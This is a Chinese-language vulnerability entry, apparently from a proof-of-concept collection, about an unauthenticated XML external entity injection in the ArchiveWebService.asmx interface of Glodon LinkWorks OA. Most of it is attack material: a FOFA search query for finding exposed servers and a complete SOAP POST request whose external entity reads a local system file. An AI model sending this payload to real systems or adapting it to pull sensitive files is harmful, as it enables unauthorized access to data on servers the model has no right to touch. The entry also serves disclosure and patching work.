# 广联达OA接口ArchiveWebService存在XML实体注入漏洞广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞，未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件，获取敏感信息，使系统处于极不安全的状态。 ## fofa ```yaml body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" ``` ## poc ```yaml POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo" <!DOCTYPE Archive [ <!ENTITY secret SYSTEM "file:///windows/win.ini"> ]> <Archive> <ArchiveInfo> <UploaderID> ############ &secret; ############## </UploaderID> </ArchiveInfo> <Result> <MainDoc>Document Content</MainDoc> </Result> <DocInfo> <DocTypeID>1</DocTypeID> <DocVersion>1.0</DocVersion> </DocInfo> </Archive> string string ``` ![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407181247294.png)